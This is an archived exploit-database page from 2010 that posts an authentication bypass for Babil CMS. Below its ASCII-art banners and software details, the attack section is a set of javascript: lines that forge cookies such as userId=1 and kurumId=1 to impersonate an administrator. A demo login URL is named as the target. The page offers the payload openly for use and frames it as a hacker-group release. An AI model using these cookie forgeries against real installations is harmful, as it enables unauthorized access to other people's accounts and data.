Home / os / win7

[webapps / 0day] - Babilcms <= Insecure Cookie (Handling-

Posted on 24 December 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Babilcms &lt;= Insecure Cookie (Handling-Jacking) Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Babilcms &lt;= Insecure Cookie (Handling-Jacking) Exploit by KnocKout in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>======================================================
Babilcms &lt;= Insecure Cookie (Handling-Jacking) Exploit
======================================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3                                                                      3
3             _     __       __    ________     __  __                 3
7           /&#039;   /&#039;__`   /&#039;__` /\_____     / /                 7
1          /\_, /\_L  /\_L \/___//&#039;/&#039;   \_   \____           1
3          /_/ /_/_\_&lt;_/_/_\_&lt;_   /&#039; /&#039;    /&#039;_`   &#039;__`          3
3               / L  / L  /&#039; /&#039;    / L   L          3
7               \_ \____/  \____//\_/       \___,_ \_,__/         7
1               /_//___/   /___/ //        /__,_ //___/          1
3              &gt;&gt; Exploit database separated by exploit                3
3                     type (local, remote, DoS, etc.)                  3
7                                                                      7
1          [+] Site            : 1337db.com                            1
3          [+] Support e-mail  : submit[at]1337db.com                  3
3                                                                      3
7               ############################################           7
1               I&#039;m KnocKout 1337 Member from 1337 DataBase            1
3               ############################################           3
3                                                                      3                                            
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Babil CMS
|~Price : N/A
|~Version : N/A
|~Software: http://www.babilcrm.com/
|~Vulnerability Style : Cookie data Hijack
|~Vulnerability Dir : /
|~Google Keyword : N/A
|[~]Date : &quot;23.12.2010&quot;
|[~]Tested on : (L):Vista (R):DEMO
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://www.babilcrm.com/demo/login.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation handling - jacking~}|
    
javascript:document.cookie=&quot;toplamAktivite=7;path=/&quot;;
javascript:document.cookie=&quot;userId=1;path=/&quot;;
javascript:document.cookie=&quot;username=babil;path=/&quot;;
javascript:document.cookie=&quot;departmanId=3;path=/&quot;;
javascript:document.cookie=&quot;subeId=5;path=/&quot;;
javascript:document.cookie=&quot;aktifKurumAdi=Babil+CRM;path=/&quot;;
javascript:document.cookie=&quot;aktifKurumId=1;path=/&quot;;
javascript:document.cookie=&quot;kurumId=1;path=/&quot;;
javascript:document.cookie=&quot;soyad=CRM;path=/&quot;;
javascript:document.cookie=&quot;ad=Babil;path=/&quot;;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    To your continue..

    =============================================================
                .__        _____        _______                 
                |  |__    /  |  |___  __   _  \_______   ____  
                |  |    /   |  |  /  /  /_  \_  __ \_/ __  
                |   H  /    ^   /&gt;    &lt;  \_/     | /  ___/ 
                |___|  /\____   |/__/\_ \_____  /__|    \___  &gt;
                     /      |__|      /      /            / 
                         _____________________________  
                        /   _____/\_   _____/\_   ___  
                        \_____    |    __)_ /      / 
                        /         |        \     \____
                       /_______  //_______  / \______  /
                               /         /         /   Was here.
  ================================================================


# <a href='http://1337db.com/'>1337db.com</a> [2010-12-24]</pre></body></html>

 

TOP

Malware :

Exploits :